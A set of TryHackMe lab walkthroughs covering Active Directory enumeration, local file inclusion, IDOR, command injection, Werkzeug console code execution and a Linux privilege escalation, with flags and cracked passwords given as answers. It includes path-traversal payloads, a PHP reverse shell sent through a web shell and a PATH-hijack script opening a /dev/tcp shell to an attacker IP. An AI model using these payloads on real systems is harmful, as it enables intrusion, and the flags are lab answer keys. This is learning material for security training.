TryHackMe – Enumerating Active Directory Walkthrough

This is a walkthrough for “Enumerating Active Directory” of TryHackMe

Task2

Q1. What native Windows binary allows us to inject credentials legitimately into memory?

A. runas.exe

Q2. What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

A. /netonly

Q3. What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

A. SYSVOL

Q4. When performing dir \za.tryhackme.com\SYSVOL, what type of authentication is performed by default?

A. Kerberos Authentication

Task3

Q1. How many Computer objects are part of the Servers OU?

Hint. Use MMC and navigate to the Servers OU

Follow the steps mentioned in TryHackMe to set up MMC.

ServersVerify the OU.

A. 2

Q2. How many Computer objects are part of the Workstations OU?

WorkstationsVerify the OU.

A. 1

Q3. How many departments (Organisational Units) does this organisation consist of?

Hint. Look under the People OU for department OUs.

PeopleCheck the subordinates.

A. 7

Q4. How many Admin tiers does this organisation have?

Hint. Look under the Admin OU for tier OUs.

AdminsVerify the OU.

A. 3

Q5. What is the value of the flag stored in the description attribute of the t0_tinus.green account?

Find Users, Contacts, and GroupsSearch for the account from and check the flags.t0_tinus.greenDescription

A. THM{Enumerating.Via.MMC}

Task4

Q1. Apart from the Domain Users group, what other group is the aaron.harris account a member of?

aaron.harrisView the account details and review the items.Global Group memberships

za\david.cook@THMJMP1 C:\Users\david.cook>net user aaron.harris /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    aaron.harris
Full Name                    Aaron Harris
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/24/2022 10:05:11 PM
Password expires             Never
Password changeable          2/24/2022 10:05:11 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Internet Access
The command completed successfully.

A. Internet Access

Q2. Is the Guest account active? (Yay,Nay)

GuestView the account details and review the items.Account active

za\david.cook@THMJMP1 C:\Users\david.cook>net user Guest /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               No
Account expires              Never

Password last set            1/31/2025 2:47:20 PM
Password expires             Never
Password changeable          1/31/2025 2:47:20 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Guests
Global Group memberships     *Domain Guests
The command completed successfully.

A. Nay

Q3. How many accounts are a member of the Tier 1 Admins group?

Tier 1 AdminsReview the details of the group.

za\david.cook@THMJMP1 C:\Users\david.cook>net group "Tier 1 Admins" /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Group name     Tier 1 Admins
Comment

Members

-------------------------------------------------------------------------------
t1_arthur.tyler          t1_gary.moss             t1_henry.miller
t1_jill.wallis           t1_joel.stephenson       t1_marian.yates
t1_rosie.bryant
The command completed successfully.

A. 7

Q4. What is the account lockout duration of the current password policy in minutes?

View the password policy and review the items.Lockout duration

za\david.cook@THMJMP1 C:\Users\david.cook>net accounts /domain
The request will be processed at a domain controller for domain za.tryhackme.com.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          Unlimited
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.

A. 30

Task5

Q1. What is the value of the Title attribute of Beth Nolan (beth.nolan)?

Hint. Use Get-ADUser, remember to set -Properties * to receive all properties.

beth.nolanCheck the properties of the account.Title

PS C:\Users\david.cook> Get-ADUser -Identity beth.nolan -Server za.tryhackme.com -Properties Title        


DistinguishedName : CN=beth.nolan,OU=Sales,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Beth
Name              : beth.nolan
ObjectClass       : user
ObjectGUID        : c4ae7c4c-4f98-4366-b3a1-c57debe3256f
SamAccountName    : beth.nolan
SID               : S-1-5-21-3330634377-1326264276-632209373-2760
Surname           : Nolan
Title             : Senior
UserPrincipalName :

A. Senior

Q2. What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

Hint. Use Get-ADUser, remember to set -Properties * to receive all properties.

annette.manningCheck the properties of the account.DistinguishedName

PS C:\Users\david.cook> Get-ADUser -Identity annette.manning -Server za.tryhackme.com -Properties Distingu
ishedName


DistinguishedName : CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com
Enabled           : True
GivenName         : Annette
Name              : annette.manning
ObjectClass       : user
ObjectGUID        : 57069bf6-db28-4988-ac9e-0254ca51bb2f
SamAccountName    : annette.manning
SID               : S-1-5-21-3330634377-1326264276-632209373-1257
Surname           : Manning
UserPrincipalName :

A. CN=annette.manning,OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com

Q3. When was the Tier 2 Admins group created?

Hint. Use Get-ADGroup, remember to set -Properties * to receive all properties. Answer should be in DD/MM/YYYY HH:MM:SS AM/PM format. If you remote from your own local machine and it is in a timezone other than UTC+0 you will have to take timezones into account.

Tier 2 AdminsCheck the properties of the group.Created

PS C:\Users\david.cook> Get-ADGroup -Identity "Tier 2 Admins" -Server za.tryhackme.com -Properties created



Created           : 2/24/2022 10:04:41 PM
DistinguishedName : CN=Tier 2 Admins,OU=Groups,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Global
Name              : Tier 2 Admins
ObjectClass       : group
ObjectGUID        : 6edab731-c305-4959-bd34-4ca1eefe2b3f
SamAccountName    : Tier 2 Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-1104

A. 2/24/2022 10:04:41 PM

Q4. What is the value of the SID attribute of the Enterprise Admins group?

Hint. Use Get-ADGroups, remember to set -Properties * to receive all properties.

Enterprise AdminsCheck the properties of the group.SID

PS C:\Users\david.cook> Get-ADGroup -Identity "Enterprise Admins" -Server za.tryhackme.com -Properties SID
   


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=za,DC=tryhackme,DC=com
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 93846b04-25b9-4915-baca-e98cce4541c6
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3330634377-1326264276-632209373-519

A. S-1-5-21-3330634377-1326264276-632209373-519

Q5. Which container is used to store deleted AD objects?

Hint. Use Get-ADDomain and review the information

za.tryhackme.comVerify the properties of the domain.DeletedObjectsContainer

PS C:\Users\david.cook> Get-ADDomain -Server za.tryhackme.com


ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=za,DC=tryhackme,DC=com
DeletedObjectsContainer            : CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

A. CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task6

Q1. What command can be used to execute Sharphound.exe and request that it recovers Session information only from the za.tryhackme.com domain without touching domain controllers?

A. Sharphound.exe –CollectionMethods Session –Domain za.tryhackme.com –ExcludeDCs

Q2. Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

Hint. Use the Per-Built Analytics Queries.

Sharphound.exeand run it.

PS C:\Users\andrea.mitchell> copy C:\Tools\Sharphound.exe ~\Documents\
PS C:\Users\andrea.mitchell> cd ~\Documents\
PS C:\Users\andrea.mitchell\Documents> .\Sharphound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

At the end of the process, a ZIP file will be created.

PS C:\Users\andrea.mitchell\Documents> dir


    Directory: C:\Users\andrea.mitchell\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/31/2025   3:44 PM         121297 20250131154447_BloodHound.zip
-a----        3/16/2022   5:19 PM         906752 Sharphound.exe
-a----        1/31/2025   3:44 PM         359470 YzE4MDdkYjAtYjc2MC00OTYyLTk1YTEtYjI0NjhiZmRiOWY1.bin

Download the ZIP file with the SCP command.

$ scp andrea.mitchell@THMJMP1.za.tryhackme.com:C:/Users/andrea.mitchell/Documents/20250131154447_BloodHound.zip .
andrea.mitchell@thmjmp1.za.tryhackme.com's password: 
20250131154447_BloodHound.zip                                           100%  118KB  59.2KB/s   00:02

neo4j, and log in.bloodhound

$ sudo neo4j console
$ bloodhound

bloodhoundUpload the ZIP file by dragging and dropping it to the GUI.

AnalysisVerify your account from .List all kerberoastable Accounts

A. 4

Q3. How many machines do members of the Tier 1 Admins group have administrative access to?

Hint. Search for the Tier 1 Admins group and enumerate its information.

Tier 1 AdminsCheck from the group.Node InfoLocal ADMIN RIGHTS

A. 2

Q4. How many users are members of the Tier 2 Admins group?

Hint. Search for the Tier 2 Admins group and enumerate its information.

Tier 2 AdminsCheck from the group.Node InfoGROUP MEMBERS

A. 15

TryHackMe – Lo-Fi Walkthrough

This is the Walkthrough for TryHackMe “Lo-Fi”.

Task1

Q1. Climb the filesystem to find the flag!

Perform a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.174.194 -oN nmap_result
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a5:97:85:99:30:80:e2:7b:02:b1:ac:c9:65:e1:9d:05 (RSA)
|   256 e8:dc:f6:8d:84:fa:ab:0d:80:77:23:47:78:f4:31:ad (ECDSA)
|_  256 24:82:a1:9c:a6:3b:38:58:52:c2:21:13:25:86:55:f8 (ED25519)
80/tcp    open     http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Lo-Fi Music
|_http-server-header: Apache/2.2.22 (Ubuntu)

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.2p1
80	http	Apache/2.2.22

80Access the number port.

DiscographyWhen you click on the link, the file specified by is loaded.?page=

It looks like LFI can be done.
I was able to load the file as follows.?page=../../../../../../etc/passwd/etc/passwd

?page=../../../../../../flag.txtI was able to get the flag at .

A. flag{e4478e0eab69bd642b8238765dcb7d18}

TryHackMe – OWASP TOP 10 – 2021 Walkthrough

This is a Walkthrough of TryHackMe “OWASP Top 10 – 2021”.

Task4

Q2. Deploy the machine and go to http://MACHINE_IP – Login with the username noot and the password test1234.

Launch the target machine, visit the website, and you will see a login form.

Username: nootLog in with ,.Password: test1234

Q3. Look at other users’ notes. What is the flag?

Hint. The URL contains ?note_id=1 – I wonder what happens if you change the parameter value? You might be able to access another user’s notes.

note_id=1It seems that the note with the number specified in the parameter will be displayed as follows.note_id

note_id=0You can get another note data by specifying and you get the flag.

A. flag{fivefourthree}

Task8

Q1. What is the name of the mentioned directory?

Hint. Have a look at the source code on the /login page.

81Access the number port.

/login.phpI found the path in the source code of ./assets

A. /assets

Q2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

/assetsI found access to thewebapp.db

A. webapp.db

Q3. Use the supporting material to access the sensitive data. What is the password hash of the admin user?

webapp.dbWhen I downloaded and checked the data, I found the account name and password hash value.

A. 6eea9b7ef19179a06954edd0f6c05ceb

Q4. What is the admin’s plaintext password?

Hint. Read the supporting material.

The following site is used to analyze the hash value.

https://qiita.com/embed-contents/link-card#qiita-embed-content__b92bf01b182dceba1d7ea24ecc9a4351

adminThe password hash was successfully parsed, and the plaintext of the password was known.

A. qwertyuiop

Q5. Log in as the admin. What is the flag?

/login.phpI was able to get the flag when I logged in with .Username: adminPassword: qwertyuiop

For the purposes of 1C0 THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task10

Q1. What strange text file is in the website’s root directory?

82Access the number port.

$()Command injection was successful.

$(ls)I was able to check the file structure in .

A. drpepper.txt

Q2. How many non-root/non-service/non-daemon users are there?

/etc/passwdConfirm.

A. 0

Q3. What user is this app running as?

whoamiConfirm with the command.

A. apache

Q4. What is the user’s shell set as?

/etc/passwdConfirm from:

A. /sbin/nologin

Q5. What version of Alpine Linux is running?

Hint. The version can be found in “/etc/alpine-release”.

/etc/alpine-releaseConfirm from:

A. 3.16.0

Task11

Q2. What is the value of the flag in joseph’s account?

Hint. Is there any security question that can be easily guessed?

85Access the number port.

josephI don’t know the password for , so I will try to change the password from there./resetpass1.php

There are three secret questions, but it seems easy to guess from.favorite color

When you finally enter it, you will be issued a new password, so make a note of it.green

You have successfully logged in with your new password.

I was able to get the flags from a text file.

A. THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task12

Q1. Navigate to http://TARGET_IP:86/console to access the Werkzeug console.

/consoleWhen I accessed the Werkzeug console, I was able to see the Werkzeug console.

Q2. What is the database file name (the one with the .db extension) in the current directory?

osRCE from the console was successful with the help of the module.

import os; print(os.popen("ls -l").read())

A. todo.db

Q3. Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?

Hint. The flag looks like THM{…}. Be sure to write it without the surrounding quotes!

app.pyReview the code.

import os; print(os.popen("cat app.py").read())

A. THM{Just_a_tiny_misconfiguration}

TryHackMe – Hacker vs. Hacker Walkthrough

Task1

Q1. What is the user.txt flag?

Hint. The hacker may have been a bit sloppy in their stealth measures…

Perform a port scan.

$ nmap -Pn -sC -sV -A -T4 10.10.93.193 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

You now know the operational status of the port.

port	service	version
22	ssh	OpenSSH 8.2p1
80	http	Apache httpd 2.4.41

80I was able to access the website at the number port.

Perform directory enumeration.

$ dirsearch -u http://10.10.93.193
[04:53:16] 301 -  310B  - /css  ->  http://10.10.93.193/css/
[04:53:17] 301 -  310B  - /cvs  ->  http://10.10.93.193/cvs/
[04:53:17] 200 -   26B  - /cvs/
[04:53:19] 301 -  311B  - /dist  ->  http://10.10.93.193/dist/
[04:53:19] 200 -  455B  - /dist/
[04:53:30] 301 -  313B  - /images  ->  http://10.10.93.193/images/
[04:53:30] 200 -  498B  - /images/
[04:54:14] 200 -  335B  - /upload.php

Uploading files has been rewritten./upload.php

The original process seems to be a function to determine whether the file is a file and upload it to the file.
In this case, the attacker would use a technique to bypass the extension determination by uploading a file such as the following:
Since PHP is running on the server, it is likely that the attacker uploaded a PHP reverse shell file..pdf/cvs.pdf.php

It predicts what the attacker would have uploaded and scans the subordinates..pdf.php/cvs

$ dirsearch -u http://10.10.222.254/cvs -e .pdf.php
[11:31:30] 200 -   18B  - /cvs/shell.pdf.php

/cvs/shell.pdf.phpwas hit.
Shell files can often execute commands with GET request parameters.
Fuzz the parameter name.

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.222.254/cvs/shell.pdf.php?FUZZ=ls -ic -c -fs 18
cmd                     [Status: 200, Size: 43, Words: 1, Lines: 4, Duration: 241ms]

cmdParameters discovered.

Send parameters.

?cmd=php%20-r%20%27$sock=fsockopen(%2210.6.55.144%22,1234);exec(%22bash%20%3C%263%20%3E%263%202%3E%263%22);%27

Stretch the reverse shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42840
ls
index.html
shell.pdf.php

/home/lachlan/user.txtYou can get the flag from:

/home/lachlan/user.txt

thm{af7e46b68081d4025c5ce10851430617}

A. thm{af7e46b68081d4025c5ce10851430617}

Q2. What is the proof.txt flag?

Hint. … and a bit sloppy in their automated kill scripts.

/home/lachlan/.bash_historyWhen you check the password, you will find that it is.lachlanthisistheway123

./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\nthisistheway123\nthisistheway123" | passwd
ls -sf /dev/null /home/lachlan/.bash_history

However, when I made an SSH connection, I was able to log in, but the connection was disconnected after a few seconds.

$ ssh lachlan@10.10.222.254
lachlan@10.10.222.254's password: 
Last login: Thu May  5 04:39:19 2022 from 192.168.56.1
$ pwdnope
Connection to 10.10.222.254 closed.

/home/lachlan/.bash_historyIf you check the script that you found in , the process has been killed by the script./etc/cron.d/persistence

PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done

PATH=/home/lachlan/bin:/bin:/usr/binIf you look at the commands, you can see that they are referenced in order from the path, but they are not specified with an absolute path.
If you create a file in , it will be executed./home/lachlan/binpkill/home/lachlan/binpkill/home/lachlan/bin/pkill

/home/lachlan/bin/pkillas a reverse shell script.

echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill

Wait for Netcat in advance.

$ nc -lvnp 1234

SSH in and enter the command before the process is killed.

$ ssh lachlan@10.10.222.254
$ echo '#!/bin/bash' > /home/lachlan/bin/pkill && echo 'sh -i >& /dev/tcp/10.6.55.144/1234 0>&1' >> /home/lachlan/bin/pkill && chmod +x /home/lachlan/bin/pkill
$ nope

After a while, I was able to get the root shell.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.222.254] 42862
sh: 0: can't access tty; job control turned off
# whoami
root

/root/root.txtYou can get the flag from:

/root/root.txt

thm{7b708e5224f666d3562647816ee2a1d4}

A. thm{7b708e5224f666d3562647816ee2a1d4}